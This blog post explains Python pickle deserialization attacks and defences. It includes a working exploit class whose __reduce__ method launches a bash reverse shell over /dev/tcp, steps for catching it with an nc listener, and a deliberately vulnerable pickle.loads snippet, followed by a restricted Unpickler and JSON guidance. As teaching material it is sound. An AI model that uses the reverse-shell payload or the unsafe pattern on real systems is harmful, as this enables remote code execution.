Site Logo
Niklas Heringer - Cybersecurity Blog
Cover Image

Python Deserialization Attacks Explained: How Hackers Exploit Pickle (and How to Defend)

Heard someone talk about .NET serialization? Vulnerabilities involving byte streams? Something like that?

You might not have, but deserialization bugs are common, powerful and often misunderstood.

Let’s have a deep tech talk about deserialization attacks, focusing on Python - we’ll later come to .NET and Ruby, in other posts.

Introduction to Python Deserialization Attacks

Serialization is the “process of converting a data structure or object into a byte stream” ; meaning it serves to safe data into a file easily and then transmit them over a network. The reverse process of that is Deserialization, converting byte streams back into the data’s/ object’s original structure.

Serialization is kind of like freezing an object in time - deserialization is waking it back up.

However, this convenient process can be extremely dangerous; deserializing user-supplied data without strict controls, you might just wake up a bomb.

What are Deserialization Attacks?

Deserialization attacks names attackers embedding malicious code in serialized data, which will end up being executed upon deserialization.

You can read more about the formal definition and risk management perspective of that here: https://owasp.org/www-community/vulnerabilities/Insecure_Deserialization

How Python’s Pickle Module Works (Serialization & Deserialization Explained)

In this section, i’m referencing this great article , be sure to check it out and see how they explain!

Hackers love Python’s Pickle module - and not because it’s tasty. In the wrong hands, Pickle can turn your server into an open door for remote code execution. In this guide, you’ll learn how Python deserialization attacks work, see a real exploit in action, and learn exactly how to defend against them.

pickle is included in the Python standard library, so no need to install it.

It mainly serves to (de-)serialize Python objects, whether that be simple data or complex structures like dictionaries.

Serializing Python Code

import pickle

data = {
    'Name': 'James Bond',
    'Rank': 'Commander, Royal Navy Reserve',
    'Birthday': '13. April 1968',
    'Hair': 'Sandy brown, short'
}

with open('bond.pickle', 'wb') as handle:
    pickle.dump(data, handle)

data_bytes = pickle.dumps(data)
print(data_bytes)

pickle.dump writes the serialized object into our specified file, pickle.dumps returns a byte stream containing the serialized data:

Serialized Object: Showcase

b'\x80\x04\x95x\x00\x00\x00\x00\x00\x00\x00}\x94(\x8c\x04Name\x94\x8c\nJames Bond\x94\x8c\x04Rank\x94\x8c\x1dCommander, Royal Navy Reserve\x94\x8c\x08Birthday\x94\x8c\x0e13. April 1968\x94\x8c\x04Hair\x94\x8c\x12Sandy brown, short\x94u.'

Protocol Note

When using pickle.dump, it is recommended to provide protocol=pickle.HIGHEST_PROTOCOL as parameter, to ensure newest standards (though this won’t help you with security!).

Deserializing Python code

If you want to reverse what we just did, follow along:

import pickle

with open('bond.pickle', 'rb') as handle:
    data = pickle.load(handle)
    print(data)

outputs (who would’ve thought):

{'Name': 'James Bond', 'Rank': 'Commander, Royal Navy Reserve', 'Birthday': '13. April 1968', 'Hair': 'Sandy brown, short'}

You can also directly deserialize a byte stream: data = pickle.loads(data_bytes).

Now, onto the real deal: Should we do a real deserialization example? Yaaay!

Exploiting Python Pickle Deserialization Vulnerabilities – A Step-by-Step Example

Let’s say we find a Python web application that accepts user-supplied data, stores it as a pickled object, and later loads it for session handling, caching, or state restoration.

Here’s a vulnerable snippet simulating that behavior:

Vulnerable code

import pickle

def load_user_data(serialized_data):
    return pickle.loads(serialized_data)

# Simulated untrusted input from user/session/cookie etc.
user_input = input("Paste your serialized data: ").encode()
user_data = load_user_data(user_input)

This code blindly deserializes whatever input it receives. Now let’s exploit it.

Crafting a Malicious Payload

We’ll build a Python class that triggers arbitrary command execution upon deserialization - using the __reduce__() method.

Step 1: Attacker creates and saves malicious pickle

# attacker.py

import pickle
import os

class Exploit:
    def __reduce__(self):
        return (os.system, ('/bin/bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"',))

payload = pickle.dumps(Exploit())

with open("malicious.pkl", "wb") as f:
    f.write(payload)

print("[*] Malicious pickle written to file.")

This simulates the attacker crafting a payload and sending it to the server (via a file, cookie, request, etc.).

Step 2: Victim deserializes the malicious object

# victim.py

import pickle

with open("malicious.pkl", "rb") as f:
    data = f.read()

print("[*] Deserializing received object...")
pickle.loads(data)

Step 3: Simulate

Start nc -lvnp 4444 in a terminal on your computer.

After having added chmod +x attacker.py and chmod +x victim.py: In a second Terminal, run python3 attacker.py, serializing our payload.

Then, you can pretend you were the unknowing victim (e.g. the mentioned web app) and run python3 victim.py. See what happens!


How to Defend Against Python Deserialization Attacks

Principle of Secure Deserialization

The number one rule is simple: Never deserialize data from untrusted sources.

Python’s pickle module is powerful - but also dangerous. It was never designed for secure use with external input. If an attacker can influence the serialized data, they can embed malicious logic that executes arbitrary code at deserialization time.

Even if you’re deserializing internal data, it’s worth asking: “What happens if this data gets tampered with?”


Option 1: Restrict What Can Be Deserialized

If you must use pickle, consider tightly controlling what types can be reconstructed. One way to do this is by subclassing pickle.Unpickler and overriding its behavior.

Example: Safe Unpickler with Type Restrictions

import pickle
import types
import io

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Only allow safe built-in types
        if module == "builtins" and name in {"str", "list", "dict", "set", "int", "float", "bool"}:
            return getattr(__import__(module), name)
        raise pickle.UnpicklingError(f"Attempted to load forbidden class: {module}.{name}")

def restricted_loads(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()

Usage:

data = restricted_loads(serialized_input)

This approach lets you deserialize known-safe types like dictionaries or strings, but blocks all function references, classes, and system calls that attackers often use in exploits.

Caveat: This still isn’t bulletproof. It’s a band-aid over a fundamentally unsafe mechanism. Avoid pickle entirely for any remotely user-controlled input.

Option 2: Use a Safer Format – JSON

In most cases, you don’t need pickle. If your app just stores basic data like strings, numbers, lists, or dictionaries - use json.

Example:

import json

# Serialize
data = {'username': 'alice', 'roles': ['user', 'admin']}
data_json = json.dumps(data)

# Deserialize
data = json.loads(data_json)

JSON won’t let you encode custom Python objects or functions - and that’s exactly why it’s safe.

TL;DR Defensive Checklist

✅ Safe Practice 🚫 Avoid
Use json, yaml.safe_load, or custom schemas pickle.loads() on untrusted data
If using pickle, restrict types with a custom Unpickler Using eval() or marshal with user input
Validate and sanitize all input before deserialization Blindly trusting data from files, cookies, or sessions

Bonus Tip: Log What You’re Deserializing

In applications that require complex data loading, log the structure of what you’re deserializing before acting on it. This can catch anomalies and help with incident response if things go wrong.